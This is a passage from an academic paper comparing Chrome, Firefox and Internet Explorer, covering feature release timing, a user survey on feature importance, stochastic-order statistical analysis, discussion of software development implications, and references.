profiles (different bookmarks/saved passwords/history) on the same computer user 15 Apps Allows you to install applications that will run in the browser (like games or other applications) 16 Developer tools Allows you to examine a site’s interaction with the browser 17 Personalized new tab Allows you to see your most visited sites upon the launch of the browser (the first tab that is opened on launch of the browser) 18 Click-to-Play Disables the automatic launch of a plugin’s content. The user must explicitly click on the flash/applet in-order to load and play it 19 Print preview Allows the user to view the page before printing it 20 Per-site security configuration Allows you to control which sites will block popups/cookies/images/scripts/plug-ins etc. 21 Web translation Allows the browser to translate a page automatically to a desired language 22 Spell Checking Marks misspelled input you typed and corrects it 23 Built-in PDF viewer Allows the browser to open PDF files without any 3rd party plugins 24 Sandboxing A security concept that certain parts of the browser run individually with restricted privileges only 25 RSS reader Allows the browser to know when a certain site, that supports RSS, was updated. News feeds etc. Table 4: Selected features used in comparisons [arbitrary order]. 14 Figure 13: Feature release margin example: The “personalized new tab” feature was released in Chrome 1, Internet Explorer 9, and Firefox 13 (marked with arrows). Chrome 1.0 was our starting point, 11 features included in this version which had already been included also by the competing browsers were excluded from consideration, as they did not confer any competitive advantage to any browser in the context of our study. For example, this included multiple tab browsing. Seven further features were excluded because they were released at about the same time by all three browsers, so they too did not confer any competitive advantage (Table 3 and see below). Subsequently, the study was conducted based on the 25 remaining features. These features are listed in Table 4. Note that the features are listed in a random order. 5.1.2 Feature Release Margins As the three browsers are developed by different organizations, the release dates of new versions are of course not coordinated. We therefore faced the challenge of defining what it means for one browser to release a feature ahead of another. We elected to use a conservative metric for this concept. We had already dated the release of each of the 25 selected features in each browser (Table 5). We then developed a metric which states whether a certain browser released a feature ahead of a competitor by “a meaningful margin” and/or whether a certain browser lagged a competitor by “a meaningful margin”. A browser was awarded a “win” if it released a feature ahead of all its competitors, and a penalty or “loss” was given if a browser lagged all its competitors or did not released a certain feature at all. Note that each feature can have a maximum of one “winner” and a maximum of one “loser”. If a feature had neither a “winner” nor a “loser” it was excluded from the study as no browser had a competitive advantage or disadvantage. “A meaningful margin” was defined as more than one release cycle, that is, when it took the competitors more than one version to include the feature after it was initially introduced. For example, “personalized new tab” was introduced in Chrome 1. At the time the most recent versions of Internet Explorer and Firefox were 7 and 3, respectively. The feature was subsequently released in Internet Explorer 9 and Firefox 13, meaning that this was a meaningful margin. Had the feature been released in Internet Explorer 8 or Firefox 3.5 it would not have counted as a meaningful margin, despite being later than Chrome 1. Furthermore, Firefox lagged Internet Explorer in the release of the feature in a meaningful margin (Figure 11). So in this case Chrome received a “win” and Firefox received a “loss”. All the release versions and their identification as wins or losses are shown in the results in Table 5. Note that the definition of the release margin is based on releases of new versions, and not on absolute time. This definition gives an advantage to browsers that are released infrequently. For example, any innovations included in Chrome versions 2 to 9 — a span of nearly two years — and included in Internet Explorer 9 would not be considered to have a significant margin, because Microsoft did not release any versions during all this time. Consequently our results may be considered to be conservative. 5.1.3 Feature Importance Survey To assess the relative importance of the 25 different features, we created an online survey that lists and explains these features. Survey participants were asked to evaluate the importance of each feature relative to other listed features on a discrete scale of 1 (least important) through 5 (most important). The features were listed in the same random order as in Table 4. 15 The intended audience were people who spend many hours a day on the World Wide Web. The survey was published on Reddit (sub-reddit /r/SampleSize) [26] and on CS Facebook groups of the Hebrew University and Tel-Aviv University in Israel. 254 people answered the survey, and the distribution of results is shown in Table 5. The statistical analysis was performed on all of the participants. 5.2 Statistical Analysis Procedure Opinion surveys like the one we conducted are commonly analyzed by calculating the average score received by each entry, and considering these to be the averages of samples of different sizes and unknown variance. Then a test such as Welch’s t-test is used to check whether or not these averages are significantly different. However, such an approach suffers from a threat to construct validity, because averaging implicitly assumes that the scale is a proper interval scale, meaning that the difference between 1 and 2 is the same as between 2 and 3, 3 and 4, and 4 and 5. But given that these numbers represent subjective levels of importance, this is not necessarily the case. Moreover, different people may use the scale differently. Therefore both the averaging and the statistical test are compromized. Another problem with human users is that some of them are hard to please, and always use only the bottom part of the scale, while others are easy to please, and focus on the top part of the scale. To reduce this danger our survey participation instructions included the following: “For every feature please choose how important this particular feature is compared to other features in the survey. Please try to use the full scale from ‘least important’ to ‘most important’ for the different features. You can change your marks as often as you wish before submitting.” And indeed, checking our data we found that most respondents actually used the full scale from 1 to 5, with an average near 3. These findings imply that we do not need to perform adjustments to the data to compensate for potentially different behaviors [38]. Nevertheless, comparing average scores is still not justifiable. We therefore use an analysis method due to Yakir and Gilula, where brand A is judged to be superior to brand B if the distribution of opinions about A dominates the distribution of opinions about B in the stochastic order sense [42]. Note that in our case the “brands” are not Microsoft, Google, and Mozilla, but rather the sets of features which represent the “wins” or “losses” of each browser. This will be clear in the results of Subsection 5.3. Mathematically stochastic order is expressed as ∀s : FA(s) ≤ FB(s), where FA and FB are the cumulative distribution functions of the opinions regarding A and B, respectively. Graphically, the plot of FA is lower and to the right of the plot of FB, and it accumulates more slowly. In simple terms this means that for each level of opinion 1 to 5 the probability that A receives a score of at least this level is higher than the probability that B receives such a score. However, in many cases one distribution does not dominate the other (and their graphs cross each other). It is then necessary to adjust the data by grouping brands and/or score levels together until dominance is achieved [30, 32, 31, 37]. In more detail, the analysis procedure is as follows [42]: 1. Identify subsets of homogeneous brands. Ideally, for all pairs of brands, the distribution of scores of one brand will dominate the distribution of scores of the other brand. This will induce a full order on the brands. But in reality there may be certain subsets of brands that are incomparable, and do not dominate each other. These subsets need to be identified, and the ranking will then be between subsets instead of between individual brands. The subsets are found by an agglomerative single-link clustering algorithm. Initially all pairs of individual brands are compared, and the chi-squared statistics computed. If the minimum statistic value obtained is below a predefined critical value, the two distributions are considered the same and the brands are combined into a joint subset. In subsequent steps, when subsets are being considered, the maximal statistic among all pairs (where one brand comes from the first subset and the other brand from the second subset) is compared to the critical value. 16 The suggested critical value is the upper α percentile from the chi-square distribution with J − 1 degrees of freedom, where J is the number of score levels in the distribution (in our case, 5) and α = 0.1 (or another value chosen by the analyst). A chi-square-based test is then applied to test whether the obtained partitioning is significant, as described in [42]. The result of this step is then one or more subsets of brands, which are heterogeneous relative to each other, but the brands within each subset are homogeneous. 2. Find the widest collapsed scale. Even when brands (or subsets of brands) have heterogeneous distributions of scores, the distributions may not dominate each other in the stochastic order sense. This happens if the distributions cross each other. However, it is always possible to create a dominance relationship by collapsing adjacent scores and thereby reducing the fidelity of the distributions. The problem is that collapsing can be done in many different ways, and the selected collapsing may affect the resulting dominance order. We therefore need to define which collapsing is better. The suggested approach is to strive for minimal loss of information, in the sense of preserving as many of the original scores as possible. Hence we are looking for the widest collapsed scale that nevertheless leads to dominance. Technically, the procedure is as follows. Given all the subsets of brands, we consider all possible orders of these subsets. For each such order we find the collapsing that leads to dominance in this order (if such a collapsing exists). The order that is supported by the widest collapsing is then selected. This implies using the collapsing which retains the highest number of distinct scores. 3. Note the stochastic order between the subsets of brands. At this point a well-defined stochastic order is guaranteed to exist. This order is the result of the analysis. 4. Verify statistical significance. Collapsing score levels leads to loss of information relative to the original data. A chi-square-based test is used to demonstrate that the loss is not significant, and therefore the results will still reflect the original data. For details see [42]. In our case the brands are the features of the browsers. But we don’t really care about ranking the individual features. Rather, we want to rank sets of features. For example, we can take the set of features that were Chrome “wins”, and compare it to the set of features that were Chrome “losses”. If the first set turns out to be more important to users, then this testifies that Chrome project managers chose wisely and invested their resources in prioritizing the more important features first. To perform these calculations we used the Insight for R v0.4 software package which implements this ap- proach2. Given the adjusted (collapsed) data, we also calculate the polarity index. The polarity index is the ratio of users who considered features important (levels 4 and 5) to the rest (levels 1 to 3). A polarity index less than 1 indicates that the balance is skewed towards not important, while a polarity index higher than 1 indicates that user opinion is skewed towards most important. Unlike average scores, the polarity index has a direct quantitative meaning and therefore the indexes of different brands can be compared to each other. 5.3 Results 5.3.1 Early Release of Features In order to analyze which browser released features earlier than its competitors we identified the “wins” and “losses” of each browser, as indicated in Table 5. Our results show that Chrome received a “win” in 6 features and Firefox in 5 features. In contrast, Internet Explorer did not receive any “wins”, and 14 features did not have a “winner”. Chrome received a “loss” in 5 features, Firefox in 6 features, and Internet Explorer in 13 features. Here only one feature was not ascribed as a “loss” to any of the browsers (the “web translation” feature). These results already show that Chrome tended to release new features ahead of the other browsers, with Firefox being a very close second. Internet Explorer lagged far behind both of them, as it did not release any feature ahead of the competition and it was the last to release half of the features in the study. 2 The software and statistics advice were kindly provided by professor Zvi Gilula. 17 # Feature Feature release version Survey results Explorer Firefox Chrome 1 2 3 4 5 1 Add-ons manager pre 8 pre 3 4 L 10 24 39 100 81 2 Download manager 9 L pre 3 1 7 24 48 84 91 3 Auto-updater 9 16 L 1 W 28 39 66 62 59 4 Caret navigation 8 pre 3 none L 56 61 49 43 45 5 Pinned sites 9 5 L 2 45 36 47 60 66 6 Sync 10 L 4 4 56 33 47 62 56 7 Session restore (automatically) 10 L pre 3 1 16 28 28 62 120 8 Crash/security protection 8 20 L 1 6 13 37 110 88 9 Malware protection 9 L 3 1 9 13 41 73 118 10 Outdated plugin detection none L 3 W 10 15 56 74 77 32 11 Do not track 9 4 23 L 21 28 43 85 77 12 Themes none L pre 3 W 3 134 60 35 21 4 13 Experimental features none L pre 3 W 8 72 76 51 43 12 14 Multiple users none L pre 3 W 12 110 50 40 37 17 15 Apps none L 16 9 W 77 63 51 47 16 16 Developer tools 8 4 L 1 51 40 44 51 68 17 Personalized new tab 9 13 L 1 W 48 61 67 49 29 18 Click-to-Play none L 8 8 W 31 54 75 53 41 19 Print preview pre 8 pre 3 9 L 19 21 58 92 64 20 Per-site security configuration 11 L 3 W 5 11 33 87 75 48 21 Web translation none none 5 W 50 66 59 55 24 22 Spell Checking 10 L pre 3 1 20 35 44 78 77 23 Built-in PDF viewer none L 19 8 W 11 28 42 80 93 24 Sandboxing pre 8 none L 1 54 43 59 51 47 25 RSS reader 8 pre 3 none L 119 65 34 22 14 Table 5: Feature release versions and survey results. W and L denote wins and losses, respectively. 5.3.2 Importance Comparisons Mere counting of “wins” and “losses” as done above does not indicate whether the features released early by Chrome were indeed the more important ones. We therefore conducted an analysis of importance by comparing the distributions of importance scores given to the sets of features that were “wins” and “losses”. Specifically, we performed an analysis of the “wins” of different browsers, an analysis of their “losses”, and a specific analysis of the “wins” versus the “losses” of Chrome. Wins The results of comparing the user opinions regarding the feature sets where each browser “won” is shown in Table 6. A stochastic order of the response levels was present without any adjustments, with Chrome ranked first and Firefox second. Since Internet Explorer did not have any “wins” it was ranked last. The Polarity Index of Chrome and Firefox were 0.67 and 0.40, respectively. While both are smaller than 1, the features in which Chrome received a “win” were still more important to the end user, since the Polarity index was higher. The direct quantitative meaning is that for Chrome users considered the “winning” features to be important 2 5 of the time, whereas for Firefox they considered them to be important only about 2 7 of the time. Losses Given limited resources the developers of a browser cannot do everything at once, so the implementation of select features must be delayed. Under such circumstances it is best to delay those features that will not be missed by many users, namely those that are considered less important. Therefore, a lower ranking and a lower 18 No. of Importance score dist. Polarity Rank Browser wins 1 2 3 4 5 index 1 Chrome 6 0.16 0.20 0.24 0.23 0.17 0.67 2 Firefox 5 0.27 0.22 0.23 0.20 0.09 0.40 3 Internet Explorer 0 N/A N/A N/A N/A N/A N/A Table 6: Comparison between Chrome and Firefox “wins”. No. of Importance score dist. Polarity Rank Browser losses 1 2 3-4 5 index∗ 1 Firefox 6 0.17 0.16 0.45 0.22 2.03 Internet Explorer 13 2 Chrome 5 0.18 0.16 0.44 0.22 1.94 Table 7: Comparison between Chrome and Firefox/Internet Explorer “losses”. Note that is this case being ranked lower is better. The polarity index is calculated differently than in other cases because scores 3 and 4 were collapsed. polarity index are favorable when comparing feature sets which are “losses”. The “loss” scores distributions of Firefox and Internet Explorer showed the same trends and could not be distinguished one from the other, so they were clustered together. In order to achieve dominance the ranking algorithm collapsed importance score levels 3 and 4 (Table 7). The result after these adjustments was that Firefox and Internet Explorer were ranked on top and Chrome was ranked lower. This means that the features in which Firefox and Internet Explorer received a “loss” were more important to the end users. However, it should be noted that the differences in the distributions were actually very small, so this difference is most probably meaningless. The Polarity Index could not be calculated in the regular way due to the unification of levels 3 and 4. The results given in the table are therefore the ratio of levels 3 to 5 to levels 1 and 2, making them higher than in other comparisons. They are close to each other, but still Chrome is a bit lower, which is better in this case. Chrome Wins and Losses Finally, we compared the features that Chrome “won” with those that it “lost”. In order to achieve a stochastic order the algorithm collapsed levels 1 and 2 together. Interestingly the “losses” won, meaning that they were considered more important (Table 8). The Polarity Index of the “wins” and the “losses” were 0.67 and 0.96, respectively, meaning the features which Chrome released ahead of its rivals were considered important to the users about 40% of the time, whereas those in which it lagged behind were considered important nearly 50% of the time. Thus the prioritization used in developing Chrome was better than that of its rivals (as shown in the two previous analyses), but it was far from perfect. 6 Discussion 6.1 Summary of Results We tested the performance of the three dominant browsers, Chrome, Firefox, and Internet Explorer, and to a lesser degree also the Opera browser, using a wide set of commonly used benchmarks and across a long period of time. The results, presented in Subsection 4.3 through Subsection 4.6 and summarized in Table 9, show that Chrome 19 No. of Importance score dist. Polarity Rank Class features 1-2 3 4 5 index 1 Losses 5 0.33 0.18 0.27 0.22 0.96 2 Wins 6 0.36 0.24 0.23 0.17 0.67 Table 8: Comparison between Chrome “wins” and “losses”. Benchmark Result SunSpider Chrome was best through 2010, now Internet Explorer is signifi- cantly better BrowserMark 2.0 Chrome is best, Explorer worst CanvasMark 2013 Chrome is relatively good but inconsistent, Firefox worst PeaceKeeper Chrome is significantly better Start-up Times initially Chrome was better but now Firefox is better, Explorer has deteriorated HTML5 Compliance Chrome is better, Explorer worst CSS3 Test Chrome is better Browserscope Security Chrome is better, Firefox worst Table 9: Summary of benchmark results. generally had an advantage over its competitors, both in terms of performance and in terms of conformance with standards. More specifically, Chrome achieved better results throughout in five of the tests: BrowserMark 2.0, Peace- Keeper, HTML5 Compliance, CSS3 Test, and Browserscope Security. Firefox achieved better results only in the start-up times test, and that only towards the end of the study period. Interestingly, Chrome start-up times results may indicate that Chrome suffers from a feature creep impacting its start-up times. Internet Explorer achieved better results only in SunSpider, in the second half of the study period. Moreover, Chrome was not worse than both competing browsers in any of the benchmarks, while Firefox and Internet Explorer were each the worst browser in two cases. In addition we compared the release dates and importance of 25 specific features, as described in Subsection 5.3. Eleven features had a “winner”, meaning that they were released by one browser ahead of the others by a meaningful margin. All but one also had a “loser”, that is a browser that lagged behind by a significant margin. The relatively low fraction of features that had a “winner” (and the fact that 7 features were excluded from the study because they did not have a “winner” nor a “loser”) indicates that the development of each browser is not isolated from its rivals. As a result, some features are released at about the same time by two or even all three browsers. On the other hand, some browsers still managed to release a fair number of innovative features: Chrome and Firefox received 6 and 5 “wins”, respectively. Internet Explorer on the other hand did not receive any “wins” and had the most “losses”, 13. Chrome and Firefox had 5 and 6 “losses”, respectively. Although Chrome and Firefox received similar numbers of “wins” the feature importance survey showed that features in which Chrome “won” were more important to the users than features in which Firefox “won”. Likewise, features in which Chrome “lost” were less important to users than the features in which Firefox and Internet Explorer had “lost”, but in the case of losses the difference was marginal. Interestingly, Chrome “losses” were actually more important to users than its “wins”. Ideally a browser should release the most important features to users first, and in case it has to lag in the release 20 of certain features they should be of less importance to users. The results indicate that Chrome project managers were somewhat better at releasing important features first than the project managers of competing browsers. This means that they generally made better choices than their rivals. However, they did not manage to focus on only the important features, and when they lagged in feature release, these features were sometimes actually more important to users. 6.2 Implications for Software Development While not the focus of our study, our results can be used to gleam some insights into basic questions in large-scale software development. This is based on the fact that the three main browsers were developed in rather different ways. However, this is somewhat speculative, and additional work is needed. One major question is the comparison of open source and proprietary software development. Our results regarding Firefox and Internet Explorer provide some evidence for the potential superiority of large-scale open- source projects. Up to 2009 Firefox was quickly gaining market share at the expense of Internet Explorer, and our benchmark results indicate that it appears to have had superior performance for most of them (this conclusion is restricted, however, by the fact that we did not measure Internet Explorer 6 and 7 and the early versions of Firefox). It also appears to have been more innovative, as reflected by having some “wins” in early introduction of new features, and much less “losses” than Internet Explorer. This is an important result, as it demonstrates that a large open-source project can in fact prioritize features better than a competing product developed in-house by a leading software firm. Of course this does not imply that this is always the case, but it provides an important case study as an instance. However, in later years Chrome came to overshadow Firefox. To the degree that Chrome is an in-house product this implies that large company projects can also be better than open-source ones. The conclusion would then be that the main factor is not the project management style but rather the companies involved, in this case Microsoft as opposed to Google. But such a conclusion is tainted by the fact that Chrome is closely related to the open-source Chromium project. So maybe the most important factor is the various project managers and contributors. This calls for further investigation as noted in the future work section below. Another sometimes contentious aspect of software development is the use of agile methodologies with a rapid release cycle as opposed to heavier plan-based methodologies with large-scale infrequent releases. Tabulating the browser version release dates indicates that Chrome and Firefox transitioned to rapid development methods, releasing a new version every 4-8 weeks (Figure 2). This meant that there were more releases and each release contained fewer new features, leading to more focus in the work on each new release. At the same time, with rapid releases the development teams could respond more quickly to their competitors’ released features which they considered to be important, and also respond quickly to user feedback and requests. Microsoft retained the traditional slow release cycle for Internet Explorer, releasing only 4 versions during the 5 years of the study, compared with 31 released versions of Chrome. This may have contributed to Internet Explorer’s downfall. 6.3 Threats to Validity Various threats to validity have been mentioned in previous sections. Here we note them together and expand on them. The first threat relates to the assessment that Chrome is the dominant browser, as shown in Figure 1. First, as noted, this data comes from StatCounter, and other counting services may reach different conclusions. Second, we focused on desktop systems, and the picture may be different on other platforms such as mobile. To address these concerns we checked other counting services and platforms, and found that most of them indicate that Chrome is of growing importance and often dominant. The most prominent dissenter is netmarketshare.com, which claims that Internet Explorer is still the dominant browser worldwide by a large margin (58% for Explorer vs. 23% for Chrome in January 2015) [13]. The difference is probably due to a much smaller sample (40 thousand web sites as opposed to 3 million for StatCounter) and differences in methodology, including an attempt to count unique users per day and to weight countries by their total traffic. We believe that the StatCounter data is more reliable, and 21 specifically prefer to count activity and not users. The issue of the mobile market is mentioned below in the future work section. Another threat to the validity of the work reported so far is its focus on purely technical aspects of browsers. We did not check the marketing aspect of the browsers, hence, we cannot separate the technical superiority from the brand name. For example, according to [27] an important aspect of Chrome’s rise was “the great promotional efforts produced by Google” in the shape of promotional videos released on the web. Examples of 7 such videos are given, including the “Chrome speed tests” video released in May 2010 that went viral; at this time Chrome was just beginning its rise in market share, and the video may have contributed to its momentum. All 7 videos were released by April 2012, when Chrome had already overtaken Firefox but was still second to Internet Explorer. Additional work from a marketing perspective is needed to alleviate this concern. A third threat is that we compared Chrome’s performance with only two main rivals (Internet Explorer and Firefox) and partially also with a third (Opera). There are many other browsers as well, and maybe Chrome is not better than all of them. The focus on this set of contenders is justified by the fact that together with Chrome they account for well over 90% of the desktop browsers market. However, if any of the smaller browsers is indeed superior to Chrome and the others, this would testify to the importance of branding and marketing relative to technical considerations. Using existing benchmarks is also a threat to validity, especially since their documentation is sometimes short on details of exactly what they measure and how. However, it should be noted that benchmarking browsers (and other system types for that matter) is not trivial. Therefore we preferred to rely on prominent benchmarks that have established themselves over the years instead of trying to devise our own — and risk threats to validity that result from our inexperience in such benchmarking. That being said, it should be noted that the benchmarks do not test all possible aspects of browser technology. For example, it is possible to conduct a more detailed study of compatibility issues [29] to try and quantify the problems that may occur with each browser. Finally, a possible threat to validity concerning the introduction of new features is that such features could be introduced in plugins before being integrated into the browser core. This would cause the dates of the releases which first included these features to be misleading. However, we do not consider this to be a serious threat as even the most popular plugins are used by only a small fraction of users. 6.4 Future Work A drawback of the current work is its focus on the desktop market. Obviously examining competing browsers in the mobile market would also be interesting. Using StatCounter.com data, it turns out that Chrome is now also the leading browser on mobile platforms [11]. However, its rise started much later, and accelerated considerably only in 2014, eventually surpassing both the Android and Safari browsers. It would be interesting to repeat our measurements with multiple releases of these browsers, and perhaps also with UC Browser, which is the fourth- ranked browser and also seems to be gaining market share, especially in emerging markets. Another potentially interesting line of study is to try and compare the relative importance of technical consid- erations, marketing campaigns and practices, and brand name. It is widely accepted that Internet Explorer gained its market dominance by being bundled with the Windows operating system, and it is reasonable to assume that the strength of UC Browser in emerging markets is related to the strength of the company which developed it, Chinese mobile Internet company UC Mobile. Chrome most probably benefited from the Google brand name and from Google’s marketing campaign. But how to separate these effects remains an open question. In the late 1990s the browser war between Internet Explorer and Mozilla (later Firefox) was portrayed in colors of a race between proprietary software and open source software. Chrome is a unique combination of both. It was initially developed within Google, but then it was largely turned into an open source project. An open question is whether it was really turned over to the open source community, or remains largely under Google control, both in terms of code contributions and in terms of management. Thus an interesting direction for further work is to dissect the sources of advances made in Chrome (or rather Chromium), and to see how many of them can be attributed to developers outside Google. 22 7 Conclusions We tested the technical performance of the three major browsers (Chrome, Firefox, and Internet Explorer) and compared the release times of 25 features. Overall it seems that all three browsers became better over time, as most of the benchmarks that were examined showed a clear improvement trend, and all the browsers evolved and received better results. It is also apparent that the release rate of versions became more frequent over the years (especially for Chrome and Firefox). In conclusion, the cumulative evidence we have collected indicates that Chrome’s rise to dominance is indeed consistent with technical superiority over its rivals and with insightful management of feature selection. However, we still cannot say that it is the result of technical superiority alone, as marketing and the Google brand probably also played an important role. Studying the marketing campaign may well be a worthwhile effort. Acknowledgments Many thanks to Zvi Gilula for his explanations about statistical procedures and for providing the software used in the analysis. This work is a greatly extended version of a class project done with Kobi Atiya, who contributed to the conceptual design and initial results. The Opera measurements were performed by Amir Massarwi. References [1] URL: http://www.w3.org/People/Berners-Lee/WorldWideWeb.html. [2] Chached version of http://www.netscape.com/newsref/pr/newsrelease591.html. URL: http://xml.coverpages. org/netscapeCode980401.html. [3] URL: https://web.archive.org/web/20110623034401/http://weblogs.mozillazine. org/ben/archives/009698.html. [4] URL: http://www-archive.mozilla.org/roadmap/roadmap-02-Apr-2003.html. [5] URL: http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/ en-US/firefox/releases/1.0.html. [6] URL: http://mozilla.github.io/process-releases/draft/development_overview/. [7] URL: http://blog.mozilla.org/channels/2011/07/18/every-six-weeks/. [8] URL: http://blog.chromium.org/2008/09/welcome-to-chromium_02.html. [9] URL: https://code.google.com/p/chromium/wiki/ChromiumBrowserVsGoogleChrome. [10] URL: http://blog.chromium.org/2010/07/release-early-release-often.html. [11] URL: http://gs.statcounter.com/. [12] URL: http://www.w3schools.com/browsers/browsers_stats.asp. [13] URL: http://netmarketshare.com/. [14] URL: https://www.webkit.org/perf/sunspider/versions.html. [15] URL: https://www.webkit.org/blog/2364/announcing-sunspider-1-0/. [16] URL: https://www.webkit.org/perf/sunspider-1.0.2/sunspider-1.0.2/driver. html. [17] URL: https://www.webkit.org/perf/sunspider-0.9.1/sunspider-0.9.1/driver. html. [18] URL: http://blogs.msdn.com/b/ie/archive/2010/11/17/html5-and-real-world- site-performance-seventh-ie9-platform-preview-available-for-developers. aspx. 23 http://www.w3.org/People/Berners-Lee/WorldWideWeb.html http://xml.coverpages.org/netscapeCode980401.html http://xml.coverpages.org/netscapeCode980401.html https://web.archive.org/web/20110623034401/http://weblogs.mozillazine.org/ben/archives/009698.html https://web.archive.org/web/20110623034401/http://weblogs.mozillazine.org/ben/archives/009698.html http://www-archive.mozilla.org/roadmap/roadmap-02-Apr-2003.html http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/en-US/firefox/releases/1.0.html http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/en-US/firefox/releases/1.0.html http://mozilla.github.io/process-releases/draft/development_overview/ http://blog.mozilla.org/channels/2011/07/18/every-six-weeks/ http://blog.chromium.org/2008/09/welcome-to-chromium_02.html https://code.google.com/p/chromium/wiki/ChromiumBrowserVsGoogleChrome http://blog.chromium.org/2010/07/release-early-release-often.html http://gs.statcounter.com/ http://www.w3schools.com/browsers/browsers_stats.asp http://netmarketshare.com/ https://www.webkit.org/perf/sunspider/versions.html https://www.webkit.org/blog/2364/announcing-sunspider-1-0/ https://www.webkit.org/perf/sunspider-1.0.2/sunspider-1.0.2/driver.html https://www.webkit.org/perf/sunspider-1.0.2/sunspider-1.0.2/driver.html https://www.webkit.org/perf/sunspider-0.9.1/sunspider-0.9.1/driver.html https://www.webkit.org/perf/sunspider-0.9.1/sunspider-0.9.1/driver.html http://blogs.msdn.com/b/ie/archive/2010/11/17/html5-and-real-world-site-performance-seventh-ie9-platform-preview-available-for-developers.aspx http://blogs.msdn.com/b/ie/archive/2010/11/17/html5-and-real-world-site-performance-seventh-ie9-platform-preview-available-for-developers.aspx http://blogs.msdn.com/b/ie/archive/2010/11/17/html5-and-real-world-site-performance-seventh-ie9-platform-preview-available-for-developers.aspx [19] URL: http://digitizor.com/2010/11/17/internet-explorer-9-caught-cheating- in-sunspider-benchmark/. [20] URL: http://www.kevs3d.co.uk/dev/canvasmark/. [21] URL: http://peacekeeper.futuremark.com/faq.action. [22] URL: http://html5test.com/about.html. [23] URL: http://css3test.com/. [24] URL: http://www.browserscope.org/security/about. [25] URL: https://dev.opera.com/blog/300-million-users-and-move-to-webkit/. [26] URL: http://www.reddit.com/r/SampleSize/. [27] URL: http://www.makeuseof.com/tag/7-awesome-google-chrome-promo-videos/. [28] Hal Berghel. “Who Won the Mosaic War?” In: Comm. ACM 41.10 (1998), pp. 13–16. [29] Shauvik Roy Chaudhary, Mukul R. Prasad, and Alessandro Orso. “X-PERT: Accurate Identification of Cross-Browser Issues in Web Applications”. In: Intl. Conf. Software Engineering. 35. 2013, pp. 702–711. DOI: 10.1109/ICSE.2013.6606616. [30] Zvi Gilula. “Grouping and Association in Contingency Tables: An Exploratory Canonical Correlation Ap- proach”. In: J. Am. Stat. Assoc. 81.395 (1986), pp. 773–779. DOI: 10.2307/2289009. [31] Zvi Gilula and Abba M. Krieger. “Collapsed Two-Way Contingency Tables and the Chi-Square Reduction Principle”. In: J. R. Stat. Soc. B (Methodological) 51.3 (1989), pp. 425–433. [32] Zvi Gilula, Abba M. Krieger, and Yaakov Ritov. “Ordinal Association in Contingency Tables: Some Inter- pretive Aspects”. In: J. Am. Stat. Assoc. 83.402 (1988), pp. 540–545. [33] Ted G. Lewis. Microsoft Rising. IEEE Computer Society Press, 1999. [34] Patrick Meenan. “How Fast is Your Website?” In: Comm. ACM 56.4 (2013), pp. 49–55. DOI: 10.1145/ 2436256.2436270. [35] Barry Phillips. “Designers: The browser war casualties”. In: Computer 31.10 (1998), pp. 14–16. URL: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=722269. [36] Gregor Richards, Andreas Gal, Brendan Eich, and Jan Vitek. “Automated construction of JavaScript bench- marks”. In: ACM SIGPLAN Notices 46.10 (2011), pp. 677–694. URL: http://dl.acm.org/citation. cfm?id=2048119. [37] Ya’acov Ritov and Zvi Gilula. “Analysis of contingency tables by correspondence models subject to order constraints”. In: J. Am. Stat. Assoc. 88.424 (1993), pp. 1380–1387. DOI: 10.2307/2291280. URL: http://www.tandfonline.com/doi/abs/10.1080/01621459.1993.10476421. [38] Peter E. Rossi, Zvi Gilula, and Greg M. Allenby. “Overcoming Scale Usage Heterogeneity: A Bayesian Hier- archical Approach”. In: J. Am. Stat. Assoc. 96.453 (2001), pp. 20–31. DOI: 10.1198/016214501750332668. URL: http://www.tandfonline.com/doi/abs/10.1198/016214501750332668. [39] Steve Sounders. “High-Performance Web Sites”. In: Comm. ACM 51.12 (2008), pp. 36–41. DOI: 10.1145/ 1409360.1409374. [40] Ronald J. Vetter, Chris Spell, and Charles Ward. “Mosaic and the world wide web”. In: Computer 27.10 (1994), pp. 49–57. URL: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= 318591. [41] Paul Windrum. “Leveraging technological externalities in complex technologies: Microsoft’s exploitation of standards in the browser wars”. In: Research Policy 33.3 (2004), pp. 385–394. URL: http://www. sciencedirect.com/science/article/pii/S0048733303001434. 24 http://digitizor.com/2010/11/17/internet-explorer-9-caught-cheating-in-sunspider-benchmark/ http://digitizor.com/2010/11/17/internet-explorer-9-caught-cheating-in-sunspider-benchmark/ http://www.kevs3d.co.uk/dev/canvasmark/ http://peacekeeper.futuremark.com/faq.action http://html5test.com/about.html http://css3test.com/ http://www.browserscope.org/security/about https://dev.opera.com/blog/300-million-users-and-move-to-webkit/ http://www.reddit.com/r/SampleSize/ http://www.makeuseof.com/tag/7-awesome-google-chrome-promo-videos/ http://dx.doi.org/10.1109/ICSE.2013.6606616 http://dx.doi.org/10.2307/2289009 http://dx.doi.org/10.1145/2436256.2436270 http://dx.doi.org/10.1145/2436256.2436270 http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=722269 http://dl.acm.org/citation.cfm?id=2048119 http://dl.acm.org/citation.cfm?id=2048119 http://dx.doi.org/10.2307/2291280 http://www.tandfonline.com/doi/abs/10.1080/01621459.1993.10476421 http://dx.doi.org/10.1198/016214501750332668 http://www.tandfonline.com/doi/abs/10.1198/016214501750332668 http://dx.doi.org/10.1145/1409360.1409374 http://dx.doi.org/10.1145/1409360.1409374 http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=318591 http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=318591 http://www.sciencedirect.com/science/article/pii/S0048733303001434 http://www.sciencedirect.com/science/article/pii/S0048733303001434 [42] Benjamin Yakir and Zvi Gilula. “An Insightful Comparison of Brands on an Arbitrary Ordinal Scale”. In: J. Market Research Soc. 40.3 (1998), pp. 249–264. [43] David B Yoffie and Michael A Cusumano. “Judo strategy. The competitive dynamics of Internet time.” In: Harvard Business Review 77.1 (1998), pp. 70–81. URL: http://europepmc.org/abstract/MED/ 10345393. 25 http://europepmc.org/abstract/MED/10345393 http://europepmc.org/abstract/MED/10345393 Introduction The Browsers Landscape Browsers History Browsers Usage Statistics Research Questions Technical Performance Experimental Design Execution of Measurements Performance Benchmarks Results and Interpretation SunSpider BrowserMark 2.0 CanvasMark 2013 PeaceKeeper Start-up Time Measurement Methodology and Results Conformance Benchmarks Results and Interpretation HTML5 Compliance CSS3 Test Browserscope Security Additional Results with Opera Feature Selection and Release Experimental Design and Methodology Feature Selection Feature Release Margins Feature Importance Survey Statistical Analysis Procedure Results Early Release of Features Importance Comparisons 